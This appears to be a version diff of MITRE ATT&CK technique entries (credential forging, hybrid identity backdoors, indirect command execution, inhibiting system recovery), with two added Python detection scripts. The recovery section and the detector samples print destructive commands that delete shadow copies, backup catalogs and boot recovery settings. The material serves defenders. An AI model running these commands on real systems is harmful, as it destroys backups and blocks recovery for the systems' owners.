modified | 2024-04-11 20:22:14.359000+00:00 | 2024-10-15 15:58:10.254000+00:00 |
x_mitre_version | 1.1 | 1.2 |
x_mitre_contributors[2] | Goldstein Menachem | Menachem Goldstein |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | Office Suite |
iterable_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | Office 365 | |
x_mitre_platforms | Google Workspace | |
[T1606] Forge Web Credentials
Current version: 1.5
Version changed from: 1.4 → 1.5
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-15 11:10:03.428000+00:00 | 2024-10-15 15:58:23.638000+00:00 |
external_references[3]['description'] | Damian Hickey. (2017, January 28). AWS-ADFS-Credential-Generator. Retrieved December 16, 2020. | Damian Hickey. (2017, January 28). AWS-ADFS-Credential-Generator. Retrieved September 27, 2024. |
external_references[3]['url'] | https://github.com/damianh/aws-adfs-credential-generator | https://github.com/pvanbuijtene/aws-adfs-credential-generator |
x_mitre_version | 1.4 | 1.5 |
x_mitre_platforms[5] | Office 365 | Office Suite |
x_mitre_platforms[6] | Google Workspace | Identity Provider |
iterable_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | Azure AD | |
[T1592] Gather Victim Host Information
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_contributors | | ['Sam Seabrook, Duke Energy'] |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-17 16:35:09.878000+00:00 | 2024-10-03 19:35:07.269000+00:00 |
description | Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).
Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)). | Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).
Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).
Adversaries may also gather victim host information via User-Agent HTTP headers, which are sent to a server to identify the application, operating system, vendor, and/or version of the requesting user agent. This can be used to inform the adversary’s follow-on action. For example, adversaries may check user agents for the requesting operating system, then only serve malware for target operating systems while ignoring others.(Citation: TrellixQakbot) |
x_mitre_version | 1.1 | 1.2 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
external_references | | {'source_name': 'TrellixQakbot', 'description': 'Pham Duy Phuc, John Fokker J.E., Alejandro Houspanossian and Mathanraj Thangaraju. (2023, March 7). Qakbot Evolves to OneNote Malware Distribution. Retrieved August 1, 2024.', 'url': 'https://www.trellix.com/blogs/research/qakbot-evolves-to-onenote-malware-distribution/'} |
[T1552.006] Unsecured Credentials: Group Policy Preferences
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['User'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-06-17 14:25:38.082000+00:00 | 2024-08-15 13:21:22.734000+00:00 |
x_mitre_version | 1.0 | 1.1 |
[T1564] Hide Artifacts
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-03-29 17:45:48.126000+00:00 | 2024-10-15 15:58:49.815000+00:00 |
x_mitre_version | 1.2 | 1.3 |
x_mitre_platforms[3] | Office 365 | Office Suite |
[T1556.007] Modify Authentication Process: Hybrid Identity
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-21 16:09:38.202000+00:00 | 2024-10-14 22:11:30.271000+00:00 |
description | Adversaries may patch, modify, or otherwise backdoor cloud authentication processes that are tied to on-premises user identities in order to bypass typical authentication mechanisms, access credentials, and enable persistent access to accounts.
Many organizations maintain hybrid user and device identities that are shared between on-premises and cloud-based environments. These can be maintained in a number of ways. For example, Azure AD includes three options for synchronizing identities between Active Directory and Azure AD(Citation: Azure AD Hybrid Identity):
* Password Hash Synchronization (PHS), in which a privileged on-premises account synchronizes user password hashes between Active Directory and Azure AD, allowing authentication to Azure AD to take place entirely in the cloud
* Pass Through Authentication (PTA), in which Azure AD authentication attempts are forwarded to an on-premises PTA agent, which validates the credentials against Active Directory
* Active Directory Federation Services (AD FS), in which a trust relationship is established between Active Directory and Azure AD
AD FS can also be used with other SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication process to AD FS and receive a token containing the hybrid users’ identity and privileges.
By modifying authentication processes tied to hybrid identities, an adversary may be able to establish persistent privileged access to cloud resources. For example, adversaries who compromise an on-premises server running a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService` process that authorizes all attempts to authenticate to Azure AD, as well as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation: AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary may edit the `Microsoft.IdentityServer.Servicehost` configuration file to load a malicious DLL that generates authentication tokens for any user with any set of claims, thereby bypassing multi-factor authentication and defined AD FS policies.(Citation: MagicWeb)
In some cases, adversaries may be able to modify the hybrid identity authentication process from the cloud. For example, adversaries who compromise a Global Administrator account in an Azure AD tenant may be able to register a new PTA agent via the web console, similarly allowing them to harvest credentials and log into the Azure AD environment as any user.(Citation: Mandiant Azure AD Backdoors) | Adversaries may patch, modify, or otherwise backdoor cloud authentication processes that are tied to on-premises user identities in order to bypass typical authentication mechanisms, access credentials, and enable persistent access to accounts.
Many organizations maintain hybrid user and device identities that are shared between on-premises and cloud-based environments. These can be maintained in a number of ways. For example, Microsoft Entra ID includes three options for synchronizing identities between Active Directory and Entra ID(Citation: Azure AD Hybrid Identity):
* Password Hash Synchronization (PHS), in which a privileged on-premises account synchronizes user password hashes between Active Directory and Entra ID, allowing authentication to Entra ID to take place entirely in the cloud
* Pass Through Authentication (PTA), in which Entra ID authentication attempts are forwarded to an on-premises PTA agent, which validates the credentials against Active Directory
* Active Directory Federation Services (AD FS), in which a trust relationship is established between Active Directory and Entra ID
AD FS can also be used with other SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication process to AD FS and receive a token containing the hybrid users’ identity and privileges.
By modifying authentication processes tied to hybrid identities, an adversary may be able to establish persistent privileged access to cloud resources. For example, adversaries who compromise an on-premises server running a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService` process that authorizes all attempts to authenticate to Entra ID, as well as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation: AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary may edit the `Microsoft.IdentityServer.Servicehost` configuration file to load a malicious DLL that generates authentication tokens for any user with any set of claims, thereby bypassing multi-factor authentication and defined AD FS policies.(Citation: MagicWeb)
In some cases, adversaries may be able to modify the hybrid identity authentication process from the cloud. For example, adversaries who compromise a Global Administrator account in an Entra ID tenant may be able to register a new PTA agent via the web console, similarly allowing them to harvest credentials and log into the Entra ID environment as any user.(Citation: Mandiant Azure AD Backdoors) |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 1.0 | 1.1 |
x_mitre_platforms[4] | Office 365 | Identity Provider |
x_mitre_platforms[3] | Google Workspace | Office Suite |
iterable_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | Azure AD | |
[T1562] Impair Defenses
Current version: 1.6
Version changed from: 1.5 → 1.6
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_contributors | | ['Jamie Williams (U ω U), PANW Unit 42', 'Liran Ravich, CardinalOps'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-20 16:43:53.391000+00:00 | 2024-10-14 22:11:30.271000+00:00 |
description | Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.
Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out of a computer or stopping it from being shut down. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Emotet shutdown)
Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components. | Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.
Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out, preventing a system from shutting down, or disabling or modifying the update process. Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Google Cloud Mandiant UNC3886 2024)(Citation: Emotet shutdown) |
x_mitre_version | 1.5 | 1.6 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
external_references | | {'source_name': 'Google Cloud Mandiant UNC3886 2024', 'description': ' Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, Mathew Potaczek, Jakub Jozwiak, and Alex Marvi. (2024, June 18). Cloaked and Covert: Uncovering UNC3886 Espionage Operations. Retrieved September 24, 2024.', 'url': 'https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations'} |
x_mitre_platforms | | Identity Provider |
x_mitre_platforms | | Office Suite |
iterable_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | Office 365 | |
[T1656] Impersonation
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-30 19:45:05.886000+00:00 | 2024-10-15 15:59:06.382000+00:00 |
x_mitre_version | 1.0 | 1.1 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | Office Suite |
iterable_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | Office 365 | |
x_mitre_platforms | Google Workspace | |
[T1070] Indicator Removal
Current version: 2.2
Version changed from: 2.1 → 2.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-04-11 22:27:54.003000+00:00 | 2024-10-15 15:59:22.125000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 2.1 | 2.2 |
x_mitre_platforms[5] | Office 365 | Office Suite |
iterable_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | Google Workspace | |
[T1202] Indirect Command Execution
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-05-05 05:06:38.938000+00:00 | 2024-10-03 14:47:17.154000+00:00 |
description | Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)
Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads. | Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), Scriptrunner.exe, as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts.(Citation: VectorSec ForFiles Aug 2017)(Citation: Evi1cg Forfiles Nov 2017)(Citation: Secure Team - Scriptrunner.exe)(Citation: SS64)(Citation: Bleeping Computer - Scriptrunner.exe)
Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads. |
external_references[1]['description'] | Evi1cg. (2017, November 26). block cmd.exe ? try this :. Retrieved January 22, 2018. | Evi1cg. (2017, November 26). block cmd.exe ? try this :. Retrieved September 12, 2024. |
external_references[1]['url'] | https://twitter.com/Evi1cg/status/935027922397573120 | https://x.com/Evi1cg/status/935027922397573120 |
external_references[3]['description'] | vector_sec. (2017, August 11). Defenders watching launches of cmd? What about forfiles?. Retrieved January 22, 2018. | vector_sec. (2017, August 11). Defenders watching launches of cmd? What about forfiles?. Retrieved September 12, 2024. |
external_references[3]['url'] | https://twitter.com/vector_sec/status/896049052642533376 | https://x.com/vector_sec/status/896049052642533376 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 1.1 | 1.2 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
external_references | | {'source_name': 'Bleeping Computer - Scriptrunner.exe', 'description': 'Bill Toulas. (2023, January 4). Hackers abuse Windows error reporting tool to deploy malware. Retrieved July 8, 2024.', 'url': 'https://www.bleepingcomputer.com/news/security/hackers-abuse-windows-error-reporting-tool-to-deploy-malware/'} |
external_references | | {'source_name': 'Secure Team - Scriptrunner.exe', 'description': 'Secure Team - Information Assurance. (2023, January 8). Windows Error Reporting Tool Abused to Load Malware. Retrieved July 8, 2024.', 'url': 'https://secureteam.co.uk/2023/01/08/windows-error-reporting-tool-abused-to-load-malware/'} |
external_references | | {'source_name': 'SS64', 'description': 'SS64. (n.d.). ScriptRunner.exe. Retrieved July 8, 2024.', 'url': 'https://ss64.com/nt/scriptrunner.html'} |
x_mitre_contributors | | Liran Ravich, CardinalOps |
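As an added example (my own code, not text from ATT&CK or from any of the sources cited above): a detector that finds the proxy binaries the T1202 description names in process-creation telemetry, recovers the command each one was asked to run, and cross-checks it against the child the proxy actually spawned. The launch switches (`forfiles /c`, `pcalua -a`, `ScriptRunner -appvscript`, WSL `bash -c` / `wsl -e`) are the documented ones for those tools; the Sysmon-style event shape, the regular expressions and the sample events are my assumptions and constructions.

```python
"""Added example, not code from the ATT&CK page: flag T1202-style indirect
execution in process-creation telemetry and recover the command the proxy
binary was asked to run. Event shape (Sysmon EID 1 field names) and the
sample events are my own assumptions / constructions."""
import ntpath
import re
from dataclasses import dataclass

# Launcher binaries named in the technique text, each with the switch that
# carries the command it will run on the caller's behalf (forfiles /c,
# pcalua -a, ScriptRunner -appvscript, WSL bash -c / wsl -e). The regexes
# are mine; they capture everything after the switch as the proxied command.
PROXY_LAUNCHERS = {
    "forfiles.exe": re.compile(r"(?:^|\s)/c\s+(?P<target>.+)$", re.I),
    "pcalua.exe": re.compile(r"(?:^|\s)-a\s+(?P<target>.+)$", re.I),
    "scriptrunner.exe": re.compile(r"(?:^|\s)-appvscript\s+(?P<target>.+)$", re.I),
    "bash.exe": re.compile(r"(?:^|\s)-c\s+(?P<target>.+)$", re.I),
    "wsl.exe": re.compile(r"(?:^|\s)(?:-e|--exec|--)\s+(?P<target>.+)$", re.I),
}

# Interpreters an AppLocker / Group Policy restriction would normally block;
# a proxy launching one of these is exactly the case the technique describes.
BLOCKED_INTERPRETERS = {"cmd", "powershell", "pwsh", "wscript", "cscript", "mshta"}


@dataclass(frozen=True)
class Finding:
    launcher: str          # proxy binary, lower-case basename
    proxied_command: str   # command taken from the proxy's own command line
    observed_child: str    # basename of the child the proxy actually spawned ("" if none seen)
    severity: str          # "high" if the target or the child is a blocked interpreter


def _basename(path: str) -> str:
    return ntpath.basename(path).lower()


def _exe_name(path_or_token: str) -> str:
    """Lower-case basename without a trailing .exe, so 'cmd' == 'C:\\...\\cmd.exe'."""
    name = _basename(path_or_token.strip('"'))
    return name[:-4] if name.endswith(".exe") else name


def _first_token(cmdline: str) -> str:
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):               # quoted program path, may contain spaces
        end = cmdline.find('"', 1)
        return cmdline[1:end] if end > 0 else cmdline[1:]
    return cmdline.split(maxsplit=1)[0] if cmdline else ""


def find_indirect_execution(events):
    """Return one Finding per launcher event whose command line names a target."""
    children_of = {}
    for ev in events:
        children_of.setdefault(ev["ParentProcessId"], []).append(ev)

    findings = []
    for ev in events:
        launcher = _basename(ev["Image"])
        pattern = PROXY_LAUNCHERS.get(launcher)
        if pattern is None:
            continue
        match = pattern.search(ev.get("CommandLine", ""))
        if match is None:
            continue
        target = match.group("target").strip()
        if len(target) >= 2 and target[0] == target[-1] == '"':   # /c "cmd /c ..." form
            target = target[1:-1]
        child_names = [_basename(c["Image"]) for c in children_of.get(ev["ProcessId"], [])]
        suspicious = {_exe_name(_first_token(target))} | {_exe_name(c) for c in child_names}
        severity = "high" if suspicious & BLOCKED_INTERPRETERS else "medium"
        findings.append(Finding(launcher, target, child_names[0] if child_names else "", severity))
    return findings


# Constructed sample telemetry (not real logs): explorer.exe (pid 900) starts
# three launchers; two of them are seen spawning their target. The last event
# is a direct cmd.exe launch and must not be reported.
SAMPLE_EVENTS = [
    {"ProcessId": 1200, "ParentProcessId": 900, "Image": r"C:\Windows\System32\forfiles.exe",
     "CommandLine": r'forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /c whoami"'},
    {"ProcessId": 1201, "ParentProcessId": 1200, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c whoami"},
    {"ProcessId": 1300, "ParentProcessId": 900, "Image": r"C:\Windows\System32\pcalua.exe",
     "CommandLine": "pcalua.exe -a calc.exe"},
    {"ProcessId": 1301, "ParentProcessId": 1300, "Image": r"C:\Windows\System32\calc.exe",
     "CommandLine": "calc.exe"},
    {"ProcessId": 1400, "ParentProcessId": 900, "Image": r"C:\Windows\System32\ScriptRunner.exe",
     "CommandLine": "ScriptRunner.exe -appvscript powershell.exe -nop -w hidden -c Get-Process"},
    {"ProcessId": 1500, "ParentProcessId": 900, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c whoami"},
]

if __name__ == "__main__":
    for f in find_indirect_execution(SAMPLE_EVENTS):
        print(f"[{f.severity}] {f.launcher} -> {f.proxied_command!r} (child seen: {f.observed_child or 'none'})")
```

A legitimate forfiles log-rotation job (`forfiles ... /c "cmd /c del @path"`) produces the same high-severity finding, so baseline by parent process and user before alerting on it. The reason parent-based rules miss the technique is visible in the sample: the cmd.exe is a child of forfiles.exe, not of the user's shell, so a rule keyed on "cmd.exe spawned by explorer.exe" never fires.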
[T1490] Inhibit System Recovery
Current version: 1.5
Version changed from: 1.4 → 1.5
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-12 02:30:08.379000+00:00 | 2024-09-24 13:27:31.881000+00:00 |
description | Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options.
Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) Furthermore, adversaries may disable recovery notifications, then corrupt backups.(Citation: disable_notif_synology_ransom)
A number of native Windows utilities have been used by adversaries to disable or delete system recovery features:
* vssadmin.exe can be used to delete all volume shadow copies on a system - vssadmin.exe delete shadows /all /quiet
* [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete volume shadow copies - wmic shadowcopy delete
* wbadmin.exe can be used to delete the Windows Backup Catalog - wbadmin.exe delete catalog -quiet
* bcdedit.exe can be used to disable automatic Windows recovery features by modifying boot configuration data - bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
* REAgentC.exe can be used to disable Windows Recovery Environment (WinRE) repair/recovery options of an infected system
* diskshadow.exe can be used to delete all volume shadow copies on a system - diskshadow delete shadows all (Citation: Diskshadow) (Citation: Crytox Ransomware)
On network devices, adversaries may leverage [Disk Wipe](https://attack.mitre.org/techniques/T1561) to delete backup firmware images and reformat the file system, then [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations.
Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware) | Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options.
Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) Furthermore, adversaries may disable recovery notifications, then corrupt backups.(Citation: disable_notif_synology_ransom)
A number of native Windows utilities have been used by adversaries to disable or delete system recovery features:
* vssadmin.exe can be used to delete all volume shadow copies on a system - vssadmin.exe delete shadows /all /quiet
* [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete volume shadow copies - wmic shadowcopy delete
* wbadmin.exe can be used to delete the Windows Backup Catalog - wbadmin.exe delete catalog -quiet
* bcdedit.exe can be used to disable automatic Windows recovery features by modifying boot configuration data - bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
* REAgentC.exe can be used to disable Windows Recovery Environment (WinRE) repair/recovery options of an infected system
* diskshadow.exe can be used to delete all volume shadow copies on a system - diskshadow delete shadows all (Citation: Diskshadow) (Citation: Crytox Ransomware)
On network devices, adversaries may leverage [Disk Wipe](https://attack.mitre.org/techniques/T1561) to delete backup firmware images and reformat the file system, then [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations.
Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, database backups, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware) |
external_references[8]['description'] | TheDFIRReport. (2022, March 1). Disabling notifications on Synology servers before ransom. Retrieved October 19, 2022. | TheDFIRReport. (2022, March 1). Disabling notifications on Synology servers before ransom. Retrieved September 12, 2024. |
external_references[8]['url'] | https://twitter.com/TheDFIRReport/status/1498657590259109894 | https://x.com/TheDFIRReport/status/1498657590259109894 |
x_mitre_version | 1.4 | 1.5 |
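As an added example (my own code, not from ATT&CK or any cited source): a matcher for the recovery-inhibiting command lines the T1490 description lists, written so that extra switches (`/for=C:`, `-quiet`), quoted paths and `&`-chained commands like the bcdedit pair above still match, while read-only use (`vssadmin list shadows`) and the re-enabling form (`recoveryenabled yes`) do not. The rule table and the sample command lines are my own; the syntaxes are the ones the description gives plus `reagentc /disable`, which is the documented switch for the REAgentC.exe case, and `diskshadow /s <script>`, the script-file mode diskshadow normally runs in.

```python
"""Added example, not code from the ATT&CK page: match the recovery-inhibiting
command lines listed for T1490 in process-creation telemetry. The rule table
and the sample command lines are my own constructions."""
import ntpath
import re
import shlex

# (utility, tokens that must appear in this order after it, feature affected)
RECOVERY_INHIBIT_RULES = [
    ("vssadmin",   ["delete", "shadows"],                      "volume shadow copies"),
    ("wmic",       ["shadowcopy", "delete"],                   "volume shadow copies"),
    ("diskshadow", ["delete", "shadows"],                      "volume shadow copies"),
    ("wbadmin",    ["delete", "catalog"],                      "Windows Backup catalog"),
    ("bcdedit",    ["recoveryenabled", "no"],                  "boot-time recovery sequence (WinRE)"),
    ("bcdedit",    ["bootstatuspolicy", "ignoreallfailures"],  "failed-boot error handling"),
    ("reagentc",   ["/disable"],                               "Windows Recovery Environment"),
]

# cmd.exe operators that chain several commands on one line, as in the
# bcdedit example the technique gives (`... ignoreallfailures & bcdedit /set ...`).
_SEGMENT_SPLIT = re.compile(r"\s*(?:&&|\|\||&|\|)\s*")


def _tokens(segment):
    """Whitespace tokens with surrounding quotes removed, lower-cased.
    Non-POSIX shlex keeps a quoted path containing spaces as one token."""
    try:
        raw = shlex.split(segment, posix=False)
    except ValueError:                       # unbalanced quote: fall back to a plain split
        raw = segment.split()
    return [t.strip('"\'').lower() for t in raw if t.strip('"\'')]


def _utility(token):
    name = ntpath.basename(token)
    return name[:-4] if name.endswith(".exe") else name


def _in_order(needles, haystack):
    """True if every needle occurs in haystack in the given order (gaps allowed,
    so extra switches such as /for=C: or -quiet do not break the match)."""
    pos = 0
    for needle in needles:
        try:
            pos = haystack.index(needle, pos) + 1
        except ValueError:
            return False
    return True


def find_recovery_inhibition(command_line):
    """Return [(utility, feature_affected, matched_segment), ...] for one command line."""
    hits = []
    for segment in _SEGMENT_SPLIT.split(command_line):
        toks = _tokens(segment)
        if not toks:
            continue
        util, args = _utility(toks[0]), toks[1:]
        for rule_util, needles, feature in RECOVERY_INHIBIT_RULES:
            if util == rule_util and _in_order(needles, args):
                hits.append((rule_util, feature, segment.strip()))
        # diskshadow usually takes its commands from a script (/s <file>), so
        # 'delete shadows all' never reaches the command line: surface the
        # invocation so the script can be pulled and read.
        if util == "diskshadow" and "/s" in args:
            hits.append(("diskshadow", "volume shadow copies (script file, review contents)", segment.strip()))
    return hits


# Constructed sample command lines (not real telemetry).
SAMPLE_COMMAND_LINES = [
    r"vssadmin.exe delete shadows /all /quiet",
    r'"C:\Windows\System32\wbadmin.exe" delete catalog -quiet',
    r"bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no",
    r"wmic shadowcopy delete",
    r"diskshadow.exe /s C:\Windows\Temp\vss.txt",
    r"vssadmin list shadows",                        # enumeration only: not flagged
    r"bcdedit /set {default} recoveryenabled yes",   # re-enables recovery: not flagged
]


def scan(command_lines=SAMPLE_COMMAND_LINES):
    return [find_recovery_inhibition(c) for c in command_lines]


if __name__ == "__main__":
    for line, hits in zip(SAMPLE_COMMAND_LINES, scan()):
        print(f"{'FLAG' if hits else 'ok  '} {line}")
        for util, feature, seg in hits:
            print(f"     {util}: {feature}  <- {seg}")
```

Matching on ordered tokens rather than on the literal strings from the description is deliberate: ransomware builders vary the switches, and `vssadmin delete shadows /for=C: /oldest` removes copies just as effectively as `/all /quiet`. Treat any hit from a non-backup-software parent as high priority; the same commands run by a backup agent's service account are the usual benign source.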
[T1056] Input Capture
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_deprecated | | False |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['Administrator', 'SYSTEM', 'root', 'User'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-30 21:01:41.752000+00:00 | 2024-08-13 17:33:45.244000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
